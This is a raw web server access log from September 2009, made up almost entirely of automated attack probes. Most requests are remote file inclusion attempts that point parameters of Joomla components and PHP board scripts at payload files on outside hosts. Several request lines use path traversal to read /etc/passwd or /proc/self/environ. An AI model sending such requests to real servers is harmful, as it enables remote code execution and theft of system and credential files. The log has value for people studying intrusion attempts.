62.75.202.55 - - [11/Sep/2009:09:49:45 -0500] "GET /logs/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:49:45 -0500] "GET /logs/access_log.1228608000%20%20/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:49:45 -0500] "GET /errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:49:50 -0500] "GET /?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [11/Sep/2009:09:49:50 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [11/Sep/2009:09:50:05 -0500] "GET /logs/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 204578 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
67.228.191.194 - - [11/Sep/2009:09:50:19 -0500] "GET /logs/access_log.1236297600//bbs//include/admin.lib.inc.php?site_path=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:50:19 -0500] "GET //bbs//include/admin.lib.inc.php?site_path=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:50:19 -0500] "GET /logs/access_log.1232928000//bbs//include/admin.lib.inc.php?site_path=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:50:19 -0500] "GET /logs//bbs//include/admin.lib.inc.php?site_path=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
209.172.33.230 - - [11/Sep/2009:09:50:52 -0500] "GET //include/mail.inc.php?skin_board_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.812"
209.172.33.230 - - [11/Sep/2009:09:50:52 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
213.215.235.2 - - [11/Sep/2009:09:50:54 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
213.215.235.2 - - [11/Sep/2009:09:50:54 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
213.215.235.2 - - [11/Sep/2009:09:50:54 -0500] "GET /logs/access_log.1244764800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
114.4.8.14 - - [11/Sep/2009:09:51:45 -0500] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
114.4.8.14 - - [11/Sep/2009:09:51:45 -0500] "GET /logs/access_log.1251763200///bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
114.4.8.14 - - [11/Sep/2009:09:51:46 -0500] "GET /logs/access_log.1247443200///bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
211.233.69.41 - - [11/Sep/2009:09:51:46 -0500] "GET /logs/?GALLERY_BASEDIR=http://www.seorakhoney.com/shop/mail/readme.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.65"
211.233.69.41 - - [11/Sep/2009:09:51:46 -0500] "GET /?GALLERY_BASEDIR=http://www.seorakhoney.com/shop/mail/readme.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
114.4.8.14 - - [11/Sep/2009:09:51:48 -0500] "GET ///bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.215.235.2 - - [11/Sep/2009:09:52:43 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
213.215.235.2 - - [11/Sep/2009:09:52:43 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
213.215.235.2 - - [11/Sep/2009:09:52:43 -0500] "GET /logs/access_log.1244764800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:53:07 -0500] "GET /logs//bbs//include/admin.lib.inc.php?site_path=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:53:07 -0500] "GET //bbs//include/admin.lib.inc.php?site_path=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:53:07 -0500] "GET /logs/access_log.1236297600//bbs//include/admin.lib.inc.php?site_path=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:09:53:08 -0500] "GET /logs/access_log.1232928000//bbs//include/admin.lib.inc.php?site_path=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
88.157.45.177 - - [11/Sep/2009:09:53:23 -0500] "GET //lang.php?ln=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
88.157.45.177 - - [11/Sep/2009:09:53:23 -0500] "GET /logs//lang.php?ln=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
88.157.45.177 - - [11/Sep/2009:09:53:23 -0500] "GET /logs//lang.php?ln=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
88.157.45.177 - - [11/Sep/2009:09:53:23 -0500] "GET //lang.php?ln=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
211.242.110.197 - - [11/Sep/2009:09:53:26 -0500] "GET /logs/?GALLERY_BASEDIR=http://www.seorakhoney.com/shop/mail/readme.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.79"
211.242.110.197 - - [11/Sep/2009:09:53:26 -0500] "GET /?GALLERY_BASEDIR=http://www.seorakhoney.com/shop/mail/readme.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
94.136.37.141 - - [11/Sep/2009:09:54:31 -0500] "GET /?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [11/Sep/2009:09:54:39 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:54:40 -0500] "GET /?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:54:41 -0500] "GET /logs/?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.803"
94.136.37.141 - - [11/Sep/2009:09:54:44 -0500] "GET /logs/?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:54:58 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:54:58 -0500] "GET /?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:55:00 -0500] "GET /?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [11/Sep/2009:09:55:06 -0500] "GET /logs/?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.803"
212.186.220.246 - - [11/Sep/2009:09:55:06 -0500] "GET /index.php?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
94.136.37.141 - - [11/Sep/2009:09:55:07 -0500] "GET /logs/?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:55:32 -0500] "GET /?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:55:32 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:55:39 -0500] "GET /?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [11/Sep/2009:09:55:40 -0500] "GET /logs/?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:55:43 -0500] "GET /logs/?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.803"
69.73.164.176 - - [11/Sep/2009:09:56:40 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.73.164.176 - - [11/Sep/2009:09:56:40 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
69.73.164.176 - - [11/Sep/2009:09:56:40 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.73.164.176 - - [11/Sep/2009:09:57:40 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.73.164.176 - - [11/Sep/2009:09:57:40 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.73.164.176 - - [11/Sep/2009:09:57:40 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
205.234.246.98 - - [11/Sep/2009:10:00:18 -0500] "GET /logs//index2.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""-"
205.234.246.98 - - [11/Sep/2009:10:00:18 -0500] "GET //index2.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""-"
205.234.246.98 - - [11/Sep/2009:10:00:18 -0500] "GET //index2.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""-"
205.234.246.98 - - [11/Sep/2009:10:00:18 -0500] "GET /logs//index2.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""-"
94.136.37.141 - - [11/Sep/2009:10:00:23 -0500] "GET /logs/access_log.1244937600/?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:10:00:28 -0500] "GET /logs/access_log.1244937600/?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:10:00:41 -0500] "GET /logs/access_log.1244937600/?sourcedir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
212.186.220.246 - - [11/Sep/2009:10:01:33 -0500] "GET /logs/index.php?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
212.186.220.246 - - [11/Sep/2009:10:01:33 -0500] "GET /index.php?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
216.22.26.195 - - [11/Sep/2009:10:02:06 -0500] "GET //login.php?_SESSION[docroot_path]=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:02:06 -0500] "GET /logs/access_log.1236038400//login.php?_SESSION[docroot_path]=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:02:06 -0500] "GET /logs//login.php?_SESSION[docroot_path]=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.186.220.246 - - [11/Sep/2009:10:02:13 -0500] "GET /logs/access_log.1244764800/index.php?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.186.220.246 - - [11/Sep/2009:10:02:13 -0500] "GET /index.php?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.22.26.195 - - [11/Sep/2009:10:02:17 -0500] "GET //login.php?_SESSION[docroot_path]=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:02:17 -0500] "GET /logs//login.php?_SESSION[docroot_path]=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:02:18 -0500] "GET /logs/access_log.1236038400//login.php?_SESSION[docroot_path]=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.186.220.246 - - [11/Sep/2009:10:02:40 -0500] "GET /logs/access_log.1244937600/index.php?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
212.186.220.246 - - [11/Sep/2009:10:03:02 -0500] "GET /logs/access_log.1245456000/index.php?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
65.55.207.97 - - [11/Sep/2009:10:03:37 -0500] "GET /logs/access_log.1160784000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.186.220.246 - - [11/Sep/2009:10:03:51 -0500] "GET /logs/access_log.1245456000/index.php?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
94.136.37.141 - - [11/Sep/2009:10:04:45 -0500] "GET /logs/access_log.1247184000/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.197.26 - - [11/Sep/2009:10:06:26 -0500] "GET /index2.php?p=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
94.23.197.26 - - [11/Sep/2009:10:06:26 -0500] "GET /logs/access_log.1245369600/index2.php?p=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
94.23.197.26 - - [11/Sep/2009:10:06:26 -0500] "GET /logs/access_log.1242777600/index2.php?p=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
94.23.197.26 - - [11/Sep/2009:10:06:27 -0500] "GET /logs/index2.php?p=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
94.23.197.26 - - [11/Sep/2009:10:06:33 -0500] "GET /index2.php?p=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
94.23.197.26 - - [11/Sep/2009:10:06:33 -0500] "GET /logs/index2.php?p=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
94.23.197.26 - - [11/Sep/2009:10:06:33 -0500] "GET /logs/access_log.1243036800/index2.php?p=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
94.23.197.26 - - [11/Sep/2009:10:06:33 -0500] "GET /logs/access_log.1242777600/index2.php?p=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
94.136.37.141 - - [11/Sep/2009:10:09:46 -0500] "GET /logs/access_log.1244937600/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.136.37.141 - - [11/Sep/2009:10:10:10 -0500] "GET /logs/access_log.1247184000/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
82.151.132.176 - - [11/Sep/2009:10:10:44 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jonrothbard.com/one.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:10:10:44 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jonrothbard.com/one.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:10:10:44 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jonrothbard.com/one.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:10:10:46 -0500] "GET /logs/access_log.1244937600/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [11/Sep/2009:10:10:46 -0500] "GET /logs/access_log.1247184000/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
82.151.132.176 - - [11/Sep/2009:10:11:15 -0500] "GET /logs/access_log.1245715200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jonrothbard.com/one.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:12:33 -0500] "GET /logs/access_log.1244764800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:12:33 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:12:33 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:12:33 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:12:34 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:12:34 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:12:34 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:12:34 -0500] "GET /logs/access_log.1244764800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:12:34 -0500] "GET /logs/access_log.1244764800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
217.169.210.130 - - [11/Sep/2009:10:12:56 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
217.169.210.130 - - [11/Sep/2009:10:12:59 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
65.55.208.133 - - [11/Sep/2009:10:13:14 -0500] "GET /logs/access_log.1248393600 HTTP/1.1" 200 591134 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.228.191.194 - - [11/Sep/2009:10:13:42 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:13:42 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:13:42 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:13:42 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:13:42 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:13:42 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:13:45 -0500] "GET /logs/access_log.1250985600/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:13:55 -0500] "GET /logs/access_log.1250985600/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://zcrew.fileave.com/zxx.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:15:32 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:15:32 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:15:33 -0500] "GET /logs/access_log.1244764800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.55.207.138 - - [11/Sep/2009:10:15:37 -0500] "GET /logs/access_log.1142812800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.228.191.194 - - [11/Sep/2009:10:15:40 -0500] "GET /logs/access_log.1244764800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:15:40 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:10:15:40 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:10:15:48 -0500] "GET /logs//components/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:10:15:48 -0500] "GET /logs/access_log.1235174400//components/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:10:15:48 -0500] "GET //components/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:10:15:49 -0500] "GET /logs//components/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
